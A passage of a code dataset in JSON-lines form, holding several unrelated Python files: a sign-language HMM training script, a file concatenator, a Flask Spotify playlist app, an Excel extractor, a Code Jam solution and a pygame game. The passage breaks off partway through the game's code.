--train_iters 25 50 75 100 --users Prerna Linda | \n HMM CV = python3 main.py --test_type cross_val --train_iters 25 50 75 100 120 140 160 --users 02-22-20_Prerna_Android 04-29-20_Linda_Android 07-24-20_Matthew_4K --cross_val_method stratified --n_splits 10 --cv_parallel --parallel_jobs 10 --hmm_insertion_penalty -80\n SBHMM EX = python3 main.py --test_type standard --train_iters 25 50 75 --sbhmm_iters 25 50 75 --users Prerna Linda --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --parallel_classifier_training --parallel_jobs 4 --hmm_insertion_penalty -70 --sbhmm_insertion_penalty -115 --neighbors 70\n SBHMM CV = python3 main.py --test_type cross_val --train_iters 25 50 75 --sbhmm_iters 25 50 75 --users Linda Prerna --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --parallel_classifier_training --parallel_jobs 4 --hmm_insertion_penalty -85 --sbhmm_insertion_penalty -85 --neighbors 70 --cross_val_method kfold --n_splits 10 --beam_threshold 2000.0\n SBHMM EX ADA = python3 main.py --test_type standard --train_iters 25 50 75 --sbhmm_iters 25 50 75 --users 02-22-20_Prerna_Android --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --hmm_insertion_penalty -70 --sbhmm_insertion_penalty -115 --classifier adaboost\n SBHMM CV Parallel = python3 main.py --test_type cross_val --train_iters 25 50 75 100 120 140 160 --sbhmm_iters 25 50 75 100 --users 02-22-20_Prerna_Android 04-29-20_Linda_Android 07-24-20_Matthew_4K --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --parallel_classifier_training --hmm_insertion_penalty -80 --sbhmm_insertion_penalty -80 --neighbors 70 --cross_val_method stratified --n_splits 10 --beam_threshold 3000.0 --cv_parallel --parallel_jobs 10\n\"\"\"\nimport sys\nimport glob\nimport argparse\nimport os\nimport shutil\n\nimport numpy as np\nfrom sklearn.model_selection import (\n KFold, StratifiedKFold, LeaveOneGroupOut, train_test_split)\n\nsys.path.insert(0, '../../')\nfrom src.prepare_data import prepare_data\nfrom src.train import create_data_lists, train, trainSBHMM\nfrom src.utils import get_results, save_results, load_json, get_arg_groups\nfrom src.test import test, testSBHMM\nfrom joblib import Parallel, delayed\nfrom statistics import mean\n\ndef copyFiles(fileNames: list, newFolder: str, originalFolder: str, ext: str):\n if os.path.exists(newFolder):\n shutil.rmtree(newFolder)\n os.makedirs(newFolder)\n\n for currFile in fileNames:\n shutil.copyfile(os.path.join(originalFolder, currFile+ext), os.path.join(newFolder, currFile+ext))\n\ndef crossValFold(train_data: list, test_data: list, args: object, fold: int):\n print(f\"Current split = {str(fold)}. Current Test data Size = {len(test_data)}\")\n ogDataFolder = \"data\"\n currDataFolder = os.path.join(\"data\", str(fold))\n trainFiles = [i.split(\"/\")[-1].strip(\".htk\") for i in train_data]\n testFiles = [i.split(\"/\")[-1].strip(\".htk\") for i in test_data]\n allFiles = trainFiles + testFiles\n\n copyFiles(allFiles, os.path.join(currDataFolder, \"ark\"), os.path.join(ogDataFolder, \"ark\"), \".ark\")\n copyFiles(allFiles, os.path.join(currDataFolder, \"htk\"), os.path.join(ogDataFolder, \"htk\"), \".htk\")\n create_data_lists([os.path.join(currDataFolder, \"htk\", i+\".htk\") for i in trainFiles], [\n os.path.join(currDataFolder, \"htk\", i+\".htk\") for i in testFiles], args.phrase_len, fold)\n \n if args.train_sbhmm:\n classifiers = trainSBHMM(args.sbhmm_cycles, args.train_iters, args.mean, args.variance, args.transition_prob, \n args.pca_components, args.sbhmm_iters, args.include_word_level_states, args.include_word_position, args.no_pca, \n args.hmm_insertion_penalty, args.sbhmm_insertion_penalty, args.parallel_jobs, args.parallel_classifier_training,\n args.multiple_classifiers, args.neighbors, args.beam_threshold, args.classifier, os.path.join(str(fold), \"\"))\n testSBHMM(args.start, args.end, args.method, classifiers, args.pca_components, args.no_pca, args.sbhmm_insertion_penalty, \n args.parallel_jobs, args.parallel_classifier_training, os.path.join(str(fold), \"\"))\n else:\n train(args.train_iters, args.mean, args.variance, args.transition_prob, fold=os.path.join(str(fold), \"\"))\n test(args.start, args.end, args.method, args.hmm_insertion_penalty, fold=os.path.join(str(fold), \"\"))\n\n if args.train_sbhmm:\n hresults_file = f'hresults/{os.path.join(str(fold), \"\")}res_hmm{args.sbhmm_iters[-1]-1}.txt'\n else:\n hresults_file = f'hresults/{os.path.join(str(fold), \"\")}res_hmm{args.train_iters[-1]-1}.txt' \n\n results = get_results(hresults_file)\n\n print(f'Current Word Error: {results[\"error\"]}')\n print(f'Current Sentence Error: {results[\"sentence_error\"]}')\n\n return [results['error'], results['sentence_error']]\n\n \n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n ############################## ARGUMENTS #####################################\n #Important\n parser.add_argument('--prepare_data', action='store_true')\n parser.add_argument('--save_results', action='store_true')\n\n #Arguments for create_data_lists()\n parser.add_argument('--test_type', type=str, default='test_on_train',\n choices=['test_on_train', 'cross_val', 'standard'])\n parser.add_argument('--users', nargs='*', default=[])\n parser.add_argument('--phrase_len', type=int, default=0)\n parser.add_argument('--random_state', type=int, default=24)\n parser.add_argument('--cross_val_method', required='cross_val' in sys.argv,\n default='kfold', choices=['kfold',\n 'leave_one_phrase_out',\n 'stratified'])\n parser.add_argument('--n_splits', required='cross_val' in sys.argv,\n type=int, default=10)\n parser.add_argument('--cv_parallel', action='store_true')\n parser.add_argument('--test_size', type=float, default=0.1)\n\n #Arguments for save_data()\n parser.add_argument('--save_results_file', type=str,\n default='all_results.json')\n\n #Arguments for training\n parser.add_argument('--train_iters', nargs='*', type=int, default=[20, 50, 80])\n parser.add_argument('--mean', type=float, default=0.0)\n parser.add_argument('--variance', type=float, default=1.0)\n parser.add_argument('--transition_prob', type=float, default=0.6)\n parser.add_argument('--hmm_insertion_penalty', default=-10)\n\n #Arguments for SBHMM\n parser.add_argument('--train_sbhmm', action='store_true') \n parser.add_argument('--sbhmm_cycles', type=int, default=1)\n parser.add_argument('--pca_components', type=int, default=50)\n parser.add_argument('--no_pca', action='store_true')\n parser.add_argument('--sbhmm_iters', nargs='*', type=int, default=[20, 50, 80])\n parser.add_argument('--include_word_level_states', action='store_true')\n parser.add_argument('--include_word_position', action='store_true')\n parser.add_argument('--parallel_classifier_training', action='store_true')\n parser.add_argument('--parallel_jobs', default=4, type=int)\n parser.add_argument('--sbhmm_insertion_penalty', default=-10)\n parser.add_argument('--neighbors', default=50)\n parser.add_argument('--multiple_classifiers', action='store_true')\n parser.add_argument('--classifier', type=str, default='knn',\n choices=['knn', 'adaboost'])\n parser.add_argument('--beam_threshold', default=3000.0)\n\n #Arguments for testing\n parser.add_argument('--start', type=int, default=-2)\n parser.add_argument('--end', type=int, default=-1)\n parser.add_argument('--method', default='recognition')\n \n args = parser.parse_args()\n ########################################################################################\n\n cross_val_methods = {'kfold': (KFold, False),\n 'leave_one_phrase_out': (LeaveOneGroupOut, True),\n 'stratified': (StratifiedKFold, True)}\n cross_val_method, use_groups = cross_val_methods[args.cross_val_method]\n\n features_config = load_json('configs/features.json')\n all_results = {'features': features_config['selected_features'],\n 'average': {}}\n \n if args.train_sbhmm:\n hresults_file = f'hresults/res_hmm{args.sbhmm_iters[-1]-1}.txt'\n else:\n hresults_file = f'hresults/res_hmm{args.train_iters[-1]-1}.txt'\n\n\n if args.prepare_data:\n\n prepare_data(features_config)\n\n if args.test_type == 'test_on_train':\n \n if len(args.users) == 0:\n htk_filepaths = glob.glob('data/htk/*htk')\n else:\n htk_filepaths = []\n for user in args.users:\n htk_filepaths.extend(glob.glob(os.path.join(\"data/htk\", '*{}*.htk'.format(user))))\n\n create_data_lists(htk_filepaths, htk_filepaths, args.phrase_len)\n \n if args.train_sbhmm:\n classifiers = trainSBHMM(args.sbhmm_cycles, args.train_iters, args.mean, args.variance, args.transition_prob, \n args.pca_components, args.sbhmm_iters, args.include_word_level_states, args.include_word_position, args.no_pca, \n args.hmm_insertion_penalty, args.sbhmm_insertion_penalty, args.parallel_jobs, args.parallel_classifier_training,\n args.multiple_classifiers, args.neighbors, args.classifier, args.beam_threshold)\n testSBHMM(args.start, args.end, args.method, classifiers, args.pca_components, args.no_pca, args.sbhmm_insertion_penalty,\n args.parallel_jobs, args.parallel_classifier_training)\n else:\n train(args.train_iters, args.mean, args.variance, args.transition_prob)\n test(args.start, args.end, args.method, args.hmm_insertion_penalty)\n \n if args.method == \"recognition\":\n all_results['fold_0'] = get_results(hresults_file)\n all_results['average']['error'] = all_results['fold_0']['error']\n all_results['average']['sentence_error'] = all_results['fold_0']['sentence_error']\n\n print('Test on Train Results')\n \n elif args.test_type == 'cross_val' and args.cv_parallel:\n print(\"You have invoked parallel cross validation. Be prepared for dancing progress bars!\")\n\n if len(args.users) == 0:\n htk_filepaths = glob.glob('data/htk/*htk')\n else:\n htk_filepaths = []\n for user in args.users:\n htk_filepaths.extend(glob.glob(os.path.join(\"data/htk\", '*{}*.htk'.format(user))))\n\n phrases = [filepath.split('/')[-1].split(\".\")[0] + \" \" + ' '.join(filepath.split('/')[-1].split(\".\")[1].split(\"_\"))\n for filepath\n in htk_filepaths]\n \n unique_phrases = set(phrases)\n group_map = {phrase: i for i, phrase in enumerate(unique_phrases)}\n groups = [group_map[phrase] for phrase in phrases]\n cross_val = cross_val_method(n_splits=args.n_splits)\n\n if use_groups:\n splits = list(cross_val.split(htk_filepaths, phrases, groups))\n else:\n splits = list(cross_val.split(htk_filepaths, phrases))\n \n stats = Parallel(n_jobs=args.parallel_jobs)(delayed(crossValFold)(np.array(htk_filepaths)[splits[currFold][0]], np.array(htk_filepaths)[splits[currFold][1]], args, currFold) for currFold in range(len(splits)))\n \n all_results['average']['error'] = mean([i[0] for i in stats])\n all_results['average']['sentence_error'] = mean([i[1] for i in stats])\n\n elif args.test_type == 'cross_val':\n\n\n word_counts = []\n phrase_counts = []\n substitutions = 0\n deletions = 0\n insertions = 0\n sentence_errors = 0\n\n if len(args.users) == 0:\n htk_filepaths = glob.glob('data/htk/*htk')\n else:\n htk_filepaths = []\n for user in args.users:\n htk_filepaths.extend(glob.glob(os.path.join(\"data/htk\", '*{}*.htk'.format(user))))\n\n phrases = [' '.join(filepath.split('.')[1].split(\"_\"))\n for filepath\n in htk_filepaths]\n \n unique_phrases = set(phrases)\n group_map = {phrase: i for i, phrase in enumerate(unique_phrases)}\n groups = [group_map[phrase] for phrase in phrases]\n cross_val = cross_val_method(n_splits=args.n_splits)\n\n if use_groups:\n splits = list(cross_val.split(htk_filepaths, phrases, groups))\n else:\n splits = list(cross_val.split(htk_filepaths, phrases))\n\n for i, (train_index, test_index) in enumerate(splits):\n\n print(f'Current split = {i}')\n \n train_data = np.array(htk_filepaths)[train_index]\n test_data = np.array(htk_filepaths)[test_index]\n\n phrase = np.array(phrases)[test_index][0]\n phrase_len = len(phrase.split(' '))\n phrase_count = len(test_data)\n word_count = phrase_len * phrase_count\n word_counts.append(word_count)\n phrase_counts.append(phrase_count)\n create_data_lists(train_data, test_data, args.phrase_len)\n\n if args.train_sbhmm:\n classifiers = trainSBHMM(args.sbhmm_cycles, args.train_iters, args.mean, args.variance, args.transition_prob, \n args.pca_components, args.sbhmm_iters, args.include_word_level_states, args.include_word_position, args.no_pca, \n args.hmm_insertion_penalty, args.sbhmm_insertion_penalty, args.parallel_jobs, args.parallel_classifier_training,\n args.multiple_classifiers, args.neighbors, args.classifier, args.beam_threshold)\n testSBHMM(args.start, args.end, args.method, classifiers, args.pca_components, args.no_pca, args.sbhmm_insertion_penalty, \n args.parallel_jobs, args.parallel_classifier_training)\n else:\n train(args.train_iters, args.mean, args.variance, args.transition_prob)\n test(args.start, args.end, args.method, args.hmm_insertion_penalty)\n \n results = get_results(hresults_file)\n all_results[f'fold_{i}'] = results\n all_results[f'fold_{i}']['phrase'] = phrase\n all_results[f'fold_{i}']['phrase_count'] = phrase_count\n\n print(f'Current Word Error: {results[\"error\"]}')\n print(f'Current Sentence Error: {results[\"sentence_error\"]}')\n\n substitutions += (word_count * results['substitutions'] / 100)\n deletions += (word_count * results['deletions'] / 100)\n insertions += (word_count * results['insertions'] / 100)\n sentence_errors += (phrase_count * results['sentence_error'] / 100)\n\n total_words = sum(word_counts)\n total_phrases = sum(phrase_counts)\n total_errors = substitutions + deletions + insertions\n mean_error = (total_errors / total_words) * 100\n mean_error = np.round(mean_error, 4)\n mean_sentence_error = (sentence_errors / total_phrases) * 100\n mean_sentence_error = np.round(mean_sentence_error, 2)\n\n all_results['average']['error'] = mean_error\n all_results['average']['sentence_error'] = mean_sentence_error\n\n print('Cross-Validation Results')\n\n elif args.test_type == 'standard':\n\n if len(args.users) == 0:\n htk_filepaths = glob.glob('data/htk/*htk')\n else:\n htk_filepaths = []\n for user in args.users:\n htk_filepaths.extend(glob.glob(os.path.join(\"data/htk\", '*{}*.htk'.format(user))))\n \n phrases = [' '.join(filepath.split('.')[1].split('_'))\n for filepath\n in htk_filepaths]\n #unique_phrases = set(phrases)\n #group_map = {phrase: i for i, phrase in enumerate(unique_phrases)}\n #groups = [group_map[phrase] for phrase in phrases]\n train_data, test_data, _, _ = train_test_split(\n htk_filepaths, phrases, test_size=args.test_size,\n random_state=args.random_state)\n\n create_data_lists(train_data, test_data, args.phrase_len)\n if args.train_sbhmm:\n classifiers = trainSBHMM(args.sbhmm_cycles, args.train_iters, args.mean, args.variance, args.transition_prob, \n args.pca_components, args.sbhmm_iters, args.include_word_level_states, args.include_word_position, args.no_pca, \n args.hmm_insertion_penalty, args.sbhmm_insertion_penalty, args.parallel_jobs, args.parallel_classifier_training,\n args.multiple_classifiers, args.neighbors, args.classifier, args.beam_threshold)\n testSBHMM(args.start, args.end, args.method, classifiers, args.pca_components, args.no_pca, args.sbhmm_insertion_penalty, \n args.parallel_jobs, args.parallel_classifier_training)\n else:\n train(args.train_iters, args.mean, args.variance, args.transition_prob)\n test(args.start, args.end, args.method, args.hmm_insertion_penalty)\n\n if args.method == \"recognition\":\n all_results['fold_0'] = get_results(hresults_file)\n all_results['average']['error'] = all_results['fold_0']['error']\n all_results['average']['sentence_error'] = all_results['fold_0']['sentence_error']\n\n print('Standard Train/Test Split Results')\n\n if args.method == \"recognition\":\n \n print(f'Average Error: {all_results[\"average\"][\"error\"]}')\n print(f'Average Sentence Error: {all_results[\"average\"][\"sentence_error\"]}')\n\n # print(all_results)\n # Loads data as new run into pickle\n if args.save_results:\n save_results(all_results, args.save_results_file)","sub_path":"SequentialClassification/main/projects/silentSpellerSBHMMJuly/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"125549332","text":"import sys\n\n\ndef cat2(filenames):\n result = \"\"\n for i in range(len(filenames)):\n readFile = open(filenames[i], \"r\")\n result += readFile.read()\n if i != len(filenames) - 1:\n result += '\\n'\n readFile.close()\n return result\n\n\ndef main():\n filenames = []\n for i in range(1, len(sys.argv)):\n filenames.append(sys.argv[i])\n print(cat2(filenames))\n\n\nif __name__ == '__main__':\n main()","sub_path":"week0_file_problem/cat2.py","file_name":"cat2.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"346203213","text":"from flask import (Flask, render_template, request, flash, session,\n redirect, jsonify, make_response)\n\nimport os\nfrom model import connect_to_db, SavedPlaylist\nimport crud\n\nimport urllib\nimport logging\nimport time\n\nSECRET_KEY = os.environ['SECRET_KEY']\nSPOTIFY_CLIENT_ID = os.environ['SPOTIFY_CLIENT_ID']\nSPOTIFY_SECRET = os.environ['SPOTIFY_SECRET']\n\napp = Flask(__name__)\napp.secret_key = SECRET_KEY\n\n@app.route('/')\ndef index():\n \"\"\"Render Home Paage\"\"\"\n return render_template('index.html')\n\n@app.route('/authorize')\ndef authorize():\n \"\"\"Redirect to Spotify OAuth to auntheticate a user.\"\"\"\n scopes = 'playlist-modify-public playlist-modify-private playlist-read-private playlist-read-collaborative user-read-email user-read-private'\n\n spotify_authorize_url = 'https://accounts.spotify.com/authorize?'\n params = {\n 'response_type': 'code', \n 'client_id': SPOTIFY_CLIENT_ID,\n 'redirect_uri': 'http://0.0.0.0:5000/callback',\n 'scope': scopes, \n 'show_dialog': True\n }\n\n query_params = urllib.parse.urlencode(params)\n response = make_response(redirect(spotify_authorize_url + query_params))\n return response\n\n@app.route('/callback')\ndef authorize_callback():\n \"\"\"Get user token.\"\"\"\n\n code = request.args.get('code')\n \n payload = crud.getToken(code)\n if payload:\n session['token'] = payload[0]\n session['refresh_token'] = payload[1]\n session['token_expiration'] = time.time() + payload[2]\n else:\n #error\n print('Token access failed')\n\n userInfo = crud.getUserInfo(session)\n spotify_id = userInfo['id']\n user = crud.getUserFromDB(spotify_id)\n\n if not user:\n user = crud.createUser(spotify_id, session)\n \n session['user_id'] = user.user_id\n logging.info('new user:' + str(session['user_id']))\n print(session['user_id'])\n\n return redirect('/')\n\n\n@app.route('/logout')\ndef logout():\n \"\"\"Disconnect user from Spotify.\"\"\"\n\n session.clear()\n crud.logout()\n \n return \"Logout Success\"\n\n\n@app.route('/user')\ndef getUser():\n \"\"\"Check if a user is authenticated.\"\"\"\n\n if 'token' in session:\n return \"Authenticated\"\n else:\n return \"Unauthenticated\"\n\n\n@app.route('/playlists')\ndef getPlaylists(): \n \"\"\"Get a list of a user's playlists.\"\"\"\n\n allPlaylistData = []\n\n spotifyPlaylistData = crud.getPlaylists(session)\n if 'items' in spotifyPlaylistData:\n allPlaylistData = spotifyPlaylistData['items']\n \n savedPlaylistIDs = crud.getSavedPlaylistIDsByUser(int(session['user_id']))\n\n regPlaylistData = [i for i in allPlaylistData if i['id'] not in savedPlaylistIDs]\n savedPlaylistData = [i for i in allPlaylistData if i['id'] in savedPlaylistIDs]\n\n data = {\n 'regPlaylistData': regPlaylistData,\n 'savedPlaylistData': savedPlaylistData\n }\n \n return data\n\n\n@app.route('/tracks/<playlist_id>')\ndef getTracks(playlist_id):\n \"\"\"Get the tracks in a playlist.\"\"\"\n\n tracks = crud.getTracks(session, playlist_id)\n\n return tracks\n\n\n@app.route('/save', methods=['POST'])\ndef savePlaylist():\n \"\"\"Save a playlist as a new playlist and update.\"\"\"\n\n # get user form info\n title = request.json.get('title')\n interval = request.json.get('interval')\n orig_playlist_id = request.json.get('playlist_id')\n\n # create a new playlist\n new_playlist = crud.createPlaylist(session, title)\n\n new_playlist_id = new_playlist['id']\n\n user_id = session['user_id']\n\n # store playlist in DB\n savedPlaylist = crud.storeSavedPlaylist(user_id, orig_playlist_id, \n new_playlist_id, interval, title)\n print(savedPlaylist)\n \n # copy over tracks in original playlist to the new playlist\n snapshot_id = crud.updatePlaylist(session, orig_playlist_id, new_playlist_id)\n\n return snapshot_id\n\n\n@app.route('/update', methods=['POST'])\ndef updatePlaylist():\n \"\"\"Update a saved playlist.\"\"\"\n\n orig_playlist_id = request.json.get('orig_playlist_id')\n new_playlist_id = request.json.get('new_playlist_id')\n snapshot_id = crud.updatePlaylist(session, orig_playlist_id, new_playlist_id)\n\n return snapshot_id\n\n\n@app.cli.command()\ndef scheduled():\n \"\"\"Test scheduled task.\"\"\"\n connect_to_db(app)\n print(crud.getSavedPlaylistsAndUsers(\"weekly\"))\n \n h = {}\n\n for i in crud.getSavedPlaylistsAndUsers(\"weekly\"):\n h['token'] = i[0]\n h['refresh_token'] = i[1]\n h['token_expiration'] = float(i[2])\n\n orig_playlist_id = i[3]\n saved_playlist_id = i[4]\n\n crud.updatePlaylist(h, orig_playlist_id, saved_playlist_id)\n\n print('Running test')\n\n\n\n\nif __name__ == '__main__':\n connect_to_db(app)\n app.run(host='0.0.0.0', debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"456072952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os.path\nimport pandas as pd\n\nclass ExcelExtractor(object):\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef __readExcel2003(self, filepath, targetSheetIndex = None, \\\n\t\ttargetSheetName = None, headerRows = 1):\n\t\timport xlrd\n\n\t\ttable = []\n\t\twb = xlrd.open_workbook(filepath)\n\n\t\t# get worksheet\n\t\tws = None\n\t\tif not targetSheetName is None:\n\t\t\tws = wb.sheet_by_name(targetSheetName)\n\t\telse:\n\t\t\tif not targetSheetIndex is None:\n\t\t\t\tws = wb.sheet_by_index(targetSheetIndex)\n\t\t\telse:\n\t\t\t\traise ValueError(\"The targetSheet arguments must be specified one: targetSheetIndex=%s, targetSheetName=%s\" % (targetSheetIndex, targetSheetName))\n\n\t\t# get cell data\n\t\tfor rowIndex in range(0, ws.nrows):\n\t\t\trow = ws.row(rowIndex)\n\t\t\trowdata = []\n\t\t\tfor colIndex in range(0, ws.ncols):\n\t\t\t\tcell = row[colIndex]\n\t\t\t\tcellval = cell.value\n\t\t\t\trowdata.append(cellval)\n\t\t\ttable.append(rowdata)\n\t\treturn pd.DataFrame(data = table[headerRows:], columns = table[:headerRows][0])\n\n\tdef __readExcel2007(self, filepath, targetSheetIndex = None, targetSheetName = None):\n\t\tfrom openpyxl.workbook import Workbook\n\n\n\t\tpass\n\n\tdef extract(self, filepath, targetSheetIndex = None, targetSheetName = None, headerRows = 1):\n\t\t\"\"\"\n\t\tExtract data from the excel file.\n\n\t\tArgs:\n\t\t\tfilepath: the path of target file.\n\t\t\ttargetSheetIndex: default 0. the index of target sheet.\n\t\t\ttargetSheetName: default None. the name of target sheet.\n\t\t\theaderRows: default 1. the rows count of header.\n\n\t\tReturns:\n\t\t\treturn the pandas.DataFrame of rows.\n\n\t\tRaises:\n\t\t\tNone\n\t\t\"\"\"\n\n\t\tif(not os.path.exists(filepath)):\n\t\t\traise FileNotFoundError(filepath)\n\n\t\tdf = None\n\t\textName = filepath.split(\".\")[-1]\n\t\tif extName == \"xls\":\n\t\t\tdf = self.__readExcel2003(filepath = filepath, targetSheetIndex = targetSheetIndex, \\\n\t\t\ttargetSheetName = targetSheetName, headerRows = headerRows)\n\t\telif extName == \"xlsx\":\n\t\t\tdf = self.__readExcel2007(filepath = filepath, targetSheetIndex = targetSheetIndex, \\\n\t\t\ttargetSheetName = targetSheetName, headerRows = headerRows)\n\t\telse:\n\t\t\traise ValueError(\"Unsupported file type: %s\" % extName)\n\t\treturn df\n\nif __name__ == \"__main__\":\n\tfilepath = os.path.abspath(r\"../../test/read_test/data/test.xls\")\n\ter = ExcelExtractor()\n\tprint(er.extract.__doc__)\n\tdf = er.extract(filepath=filepath, targetSheetIndex = 0)\n\tprint(df)\n","sub_path":"src/extractors/ExcelExtractor.py","file_name":"ExcelExtractor.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"325949091","text":"T=int(input())\r\nfor case_id in range(1,T+1):\r\n S=input()\r\n def solve():\r\n res = S[0]\r\n for i in range(1,len(S)):\r\n if ord(S[i]) >= ord(res[0]):\r\n res = S[i]+res\r\n else:\r\n res = res+S[i]\r\n return res\r\n\r\n ans = solve()\r\n print('Case #%d: %s' % (case_id, ans))\r\n import sys\r\n print('Case #%d: %s' % (case_id, ans), file=sys.stderr)\r\n","sub_path":"codes/BuildLinks1.10/test_input/CJ_16_1/16_1_1_Pred4c3_A.py","file_name":"16_1_1_Pred4c3_A.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"335586786","text":"from main import *\nimport pygame\nimport random\n\nlista_tazas = []\nlista_obstaculos = []\n\nROJO = (255, 0, 0)\n\n# Función para mover las tazas en el eje x\ndef mover_taza(lista_tazas, ciclos, pantalla):\n\n\tif len(lista_tazas) > 0:\n\t\tfor i in range(len(lista_tazas)):\n\t\t\tif ciclos == 1:\n\t\t\t\tif(lista_tazas[i][0] > 32):\n\t\t\t\t\tlista_tazas[i][0] -= 1\n\t\t\tif ciclos == 0:\n\t\t\t\tif(lista_tazas[i][0] < pantalla.get_width() - 32):\n\t\t\t\t\tlista_tazas[i][0] += 1\n\t\t\t\tif(lista_tazas[i][0] >= pantalla.get_width() - 32):\n\t\t\t\t\tlista_tazas[i][0] = 0\n\n\n# Función para mover las tazas hacia el jugador\ndef mover_taza_y(lista_tazas):\n\tif len(lista_tazas) > 0:\n\t\tfor i in range(len(lista_tazas)):\n\t\t\tlista_tazas[i][1] += 3\n\n# Coprueba si hay colisiones entre los proyectiles y las tazas\ndef Colisiones(lista_tazas, lista_proyectil, ancho_imagen):\n\n\tborro = False\n\n\tif len(lista_tazas) != 0 and len(lista_proyectil) != 0:\n\t\tfor i in range (len(lista_tazas)):\n\t\t\ts = 0\n\t\t\twhile s < ancho_imagen and not borro:\n\t\t\t\tfor j in range (len(lista_proyectil)):\n\t\t\t\t\tif lista_tazas[i][0] + s == lista_proyectil[j][0] and lista_proyectil[j][1] <= lista_tazas[i][1] :\n\t\t\t\t\t\tdel lista_tazas[i]\n\t\t\t\t\t\tdel lista_proyectil[j]\n\t\t\t\t\t\tborro = True\n\t\t\t\t\t\tbreak\n\t\t\t\t\ts = s + 0.25\n\n# Coloca las posiciones x,y de las tazas\ndef iniciar_tazas(cant_taza):\n\ts = 0\n\tcont = 0\n\ty = 25\n\tfor i in range(cant_taza):\n\t\ttaza_x = s * 40 + 35\n\t\ttaza_y = y\n\t\tif cont == 18:\n\t\t\ts = 0\n\t\t\tcont = 0\n\t\t\ty += 35\n\t\tif cont!= 0:\n\t\t\ts += 1\n\t\tcont += 1\n\t\tlista_tazas.append([taza_x, taza_y])\n\n# Resetea la lista de las tazas\ndef reset_tazas(lista_tazas):\n\ts = 0\n\tcont = 0\n\ty = 25\n\n\tif(len(lista_tazas)!=73):\n\t# Completa la lista de tazas\n\t\tfor i in range(73 - len(lista_tazas)):\n\t\t\tlista_tazas.append([0, 0])\n\n\t# Posiciona las tazas\n\tfor i in range(73):\n\t\ttaza_x = s * 40 + 35\n\t\ttaza_y = y\n\t\tif cont == 18:\n\t\t\ts = 0\n\t\t\tcont = 0\n\t\t\ty += 35\n\t\tif cont!= 0:\n\t\t\ts += 1\n\t\tcont += 1\n\t\tlista_tazas[i] = ([taza_x, taza_y])\n\n# Genera mas \"enemigos\"\n\ndef obstaculos(imagen, pantalla):\n\tx = 0\n\ty = pantalla.get_height() - imagen.get_height()\n\tvelocidad = random.randrange(2, 3)\n\tdireccion = random.randrange(0, 2)\n\n\tif(len(lista_obstaculos) < 3):\n\t\tlista_obstaculos.append([x, y, velocidad, direccion])\n\n\ndef mover_obstaculos(imagen, pantalla):\n\n\tif len(lista_obstaculos) != 0:\n\t\tfor i in range(len(lista_obstaculos)):\n\n\t\t\tif lista_obstaculos[i][0] < (pantalla.get_width() - imagen.get_width()) and lista_obstaculos[i][3] == 0:\n\t\t\t\tlista_obstaculos[i][0] += lista_obstaculos[i][2]\n\t\t\tif lista_obstaculos[i][0] >= pantalla.get_width() - imagen.get_width():\n\t\t\t\tlista_obstaculos[i][3] = 1\n\n\t\t\tif lista_obstaculos[i][0] > 0 and lista_obstaculos[i][3] == 1:\n\t\t\t\tlista_obstaculos[i][0] -= lista_obstaculos[i][2]\n\t\t\tif lista_obstaculos[i][0] <= 0:\n\t\t\t\tlista_obstaculos[i][3] = 0\n\n\ndef reset_obstaculos(lista_obstaculos):\n\tif len(lista_obstaculos)!= 0:\n\t\tfor i in range(len(lista_obstaculos)):\n\t\t\tlista_obstaculos[i][0] = random.randrange(0, 500)\n\t\t\tlista_obstaculos[i][2] = random.randrange(2, 5)\n\t\t\tlista_obstaculos[i][3] = random.randrange(0, 2)\n\n\ndef colision_obstaculos(jugador, imagen, pantalla, gato, lista_obstaculos):\n\n\tif len(lista_obstaculos) != 0:\n\t\trect_jugador = jugador.rect\n\n\t\tancho_obstaculo = imagen.get_width()\n\t\talto_obstaculo = imagen.get_height()\n\t\trect_obstaculo = (0, 0, alto_obstaculo, ancho_obstaculo)\n\n\t\tfor i in range(len(lista_obstaculos)):\n\t\t\trect_obstaculo = (lista_obstaculos[i][0], lista_obstaculos[i][1], alto_obstaculo, ancho_obstaculo)\n\t\t\tif jugador.rect.colliderect(rect_obstaculo):\n\t\t\t\tjugador.perder(pantalla, gato, lista_obstaculos)\n\t\t\t\t\n\t\t\t\tfor i in range(len(lista_obstaculos)): lista_obstaculos[i][0] = 0\n\t\t\t\tjugador.rect.x = pantalla.get_width() / 2 - jugador.imagen.get_width() / 2\n\t\t\t\tjugador.rect.y = pantalla.get_height() - jugador.imagen.get_height()\n\t\t\t\treset_tazas(lista_tazas)\n\t\t\t\treset_obstaculos(lista_obstaculos)\n\t\t\t\tjugador.puntos = 0\n\n\n\n#################################################\n\n\nclass Obstaculo(pygame.sprite.Sprite):\n\n\tdef __init__(self, pantalla):\n\t\tsuper().__init__()\n\n\t\tself.imagen1 = pygame.image.load(\"Imagenes/Obstaculos/gato_d1.png\")\n\t\tself.imagen2 = pygame.image.load(\"Imagenes/Obstaculos/gato_d2.png\")\n\t\tself.imagen3 = pygame.image.load(\"Imagenes/Obstaculos/gato_d3.png\")\n\t\tself.imagen4 = pygame.image.load(\"Imagenes/Obstaculos/gato_i1.png\")\n\t\tself.imagen5 = pygame.image.load(\"Imagenes/Obstaculos/gato_i2.png\")\n\t\tself.imagen6 = pygame.image.load(\"Imagenes/Obstaculos/gato_i3.png\")\n\n\t\tself.imagenes = [[self.imagen1, self.imagen2, self.imagen3], [self.imagen4, self.imagen5, self.imagen6]]\n\t\tself.imagen_actual = 0\n\n\t\tself.imagen = 